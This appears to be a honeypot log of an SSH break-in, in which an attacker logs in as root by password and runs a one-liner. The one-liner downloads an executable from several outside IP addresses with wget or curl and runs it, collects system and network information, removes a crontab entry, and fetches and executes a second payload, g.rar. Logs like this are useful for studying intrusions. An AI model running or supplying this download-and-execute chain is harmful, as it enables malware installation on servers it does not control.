[HONEYPOT] 175.126.82.235 :: "fuck" installer

1. Jun 20 12:52:56 localhost sshd[6768]: Accepted password for root from 175.126.82.235 port 65452 ssh2
2. Jun 20 12:52:56 localhost sshd[6768]: pam_unix(sshd:session): session opened for user root by (uid=0)
3. Jun 20 12:52:56 localhost sshd[6768]: subsystem request for sftp
4. Jun 20 12:52:56 localhost snoopy[6772]: [uid:0 sid:6772 tty:(none) cwd:/root filename:/bin/bash]: bash -c /usr/libexec/openssh/sftp-server
5. Jun 20 12:52:56 localhost snoopy[6774]: [uid:0 sid:6772 tty:(none) cwd:/root filename:/sbin/consoletype]: /sbin/consoletype stdout
6. Jun 20 12:52:56 localhost snoopy[6776]: [uid:0 sid:6772 tty:(none) cwd:/root filename:/usr/bin/id]: /usr/bin/id -u
7. Jun 20 12:52:56 localhost snoopy[6772]: [uid:0 sid:6772 tty:(none) cwd:/root filename:/usr/libexec/openssh/sftp-server]: /usr/libexec/openssh/sftp-server
8. Jun 20 12:53:11 localhost snoopy[6777]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/bash]: bash -c rm -rf /var/run/sftp.pid;filename="/fuck";$filename || (filename="/6002.rar";cd /;pwd;path=$filename;rm -f $path* || /dev/null > $path;for list in `echo http://43.255.188.2/ http://103.20.195.254/ http://122.10.85.54/`;do (wget -O $filename $list$filename || curl -o $filename $list$filename) && break;done ; if [ -f $path ];then chmod +x $path;$path && echo ExecOK;fi);sleep 1;uname -a;cat /etc/issue;df -h;ps -ef|grep -v $$||ps aux|grep -v $$||ps x|grep -v $$;netstat -antop|grep -v 127.0.0.1||netstat -ano|grep -v 127.0.0.1||netstat -an|grep -v 127.0.0.1;echo ExecOK;cat /var/run/sftp.pid && echo InstallOK;cat /var/run/mount.pid && echo InstallOK;cat /var/run/gcc.pid && echo InstallOK; url=http://43.255.188.2/g.rar;(wget --connect-timeout=20 $url || curl--connect-timeout 20 -O $url) && chmod +x g.rar && ./g.rar
9. Jun 20 12:53:11 localhost snoopy[6779]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/sbin/consoletype]: /sbin/consoletype stdout
10. Jun 20 12:53:11 localhost snoopy[6781]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/usr/bin/id]: /usr/bin/id -u
11. Jun 20 12:53:11 localhost snoopy[6782]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/rm]: rm -rf /var/run/sftp.pid
12. Jun 20 12:53:11 localhost snoopy[6783]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/fuck]: /fuck
13. Jun 20 12:53:11 localhost snoopy[6785]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/sleep]: sleep 1
14. Jun 20 12:53:11 localhost snoopy[6794]: [uid:0 sid:6788 tty:(none) cwd:/root filename:/bin/sed]: sed -i /\/etc\/cron.hourly\/gcc.sh/d /etc/crontab
15. Jun 20 12:53:12 localhost snoopy[6813]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/uname]: uname -a
16. Jun 20 12:53:12 localhost snoopy[6814]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/cat]: cat /etc/issue
17. Jun 20 12:53:12 localhost snoopy[6815]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/df]: df -h
18. Jun 20 12:53:12 localhost snoopy[6817]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/grep]: grep -v 6777
19. Jun 20 12:53:12 localhost snoopy[6816]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/ps]: ps -ef
20. Jun 20 12:53:12 localhost snoopy[6819]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/grep]: grep -v 127.0.0.1
21. Jun 20 12:53:12 localhost snoopy[6818]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/netstat]: netstat -antop
22. Jun 20 12:53:12 localhost snoopy[6820]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/cat]: cat /var/run/sftp.pid
23. Jun 20 12:53:12 localhost snoopy[6821]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/cat]: cat /var/run/mount.pid
24. Jun 20 12:53:12 localhost snoopy[6822]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/cat]: cat /var/run/gcc.pid
25. Jun 20 12:53:12 localhost snoopy[6824]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/usr/bin/wget]: wget --connect-timeout=20 http://43.255.188.2/g.rar